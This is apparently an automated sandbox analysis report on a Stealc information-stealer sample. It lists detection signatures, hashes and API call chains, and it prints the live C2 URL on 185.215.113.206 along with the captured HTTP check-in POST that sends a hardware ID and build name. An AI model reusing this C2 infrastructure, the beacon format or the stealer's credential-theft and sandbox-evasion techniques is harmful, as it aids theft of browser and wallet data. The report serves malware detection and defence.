
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559918
MD5: 3b43c7942554833f316cf7108b571f8b
SHA1: f6f15b0a739eac16980144cbc1b7e2579fe9141a
SHA256: a782058a0f3fe32eddc56aa22a302f5c1d7f718e434cf2c547336ace69a680e2
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3668 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 3B43C7942554833F316CF7108B571F8B)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2127364096.0000000004A60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 3668 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 3668 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-21T06:23:15.183425+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: file.exe.3668.0.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_000A4C50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_000C40B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_000A60D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_000B6960
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000AEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_000AEA30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_000A9B20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_000B6B79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_000A9B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_000A7750
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000B18A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B3910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000BE210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B1250
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B1269
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B4B10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000B4B29
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000ADB80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000ADB99
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_000B2390
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000B23A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000BCBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_000BDD30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000BD530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000A16A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000A16B9

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJE
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 37 32 39 38 32 30 37 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a
Data Ascii:
------AAKJKJDGCGDBGDHIJKJE
Content-Disposition: form-data; name="hwid"

24729820740F807656615
------AAKJKJDGCGDBGDHIJKJE
Content-Disposition: form-data; name="build"

mars
------AAKJKJDGCGDBGDHIJKJE--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A6C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_000A6C40
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJE
Host: 185.215.113.206
Content-Length: 210
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 34 37 32 39 38 32 30 37 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a
Data Ascii:
------AAKJKJDGCGDBGDHIJKJE
Content-Disposition: form-data; name="hwid"

24729820740F807656615
------AAKJKJDGCGDBGDHIJKJE
Content-Disposition: form-data; name="build"

mars
------AAKJKJDGCGDBGDHIJKJE--
Source: file.exe, 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/)
Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/;
Source: file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpT
Source: file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpl
Source: file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000A9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_000A9770

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00309095 0_2_00309095
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C48B0 0_2_000C48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045C951 0_2_0045C951
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00454105 0_2_00454105
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00459130 0_2_00459130
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004582C0 0_2_004582C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C42DB 0_2_003C42DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00463352 0_2_00463352
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045E44E 0_2_0045E44E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00456C01 0_2_00456C01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003A34EC 0_2_003A34EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00464D68 0_2_00464D68
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0045AD19 0_2_0045AD19
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D4636 0_2_003D4636
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004666B3 0_2_004666B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00509F01 0_2_00509F01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C07F5 0_2_004C07F5
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 000A4A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: rkukuayu ZLIB complexity 0.9949271222014925
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000C3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_000C3A50
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000BCAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_000BCAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\UX592F00.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
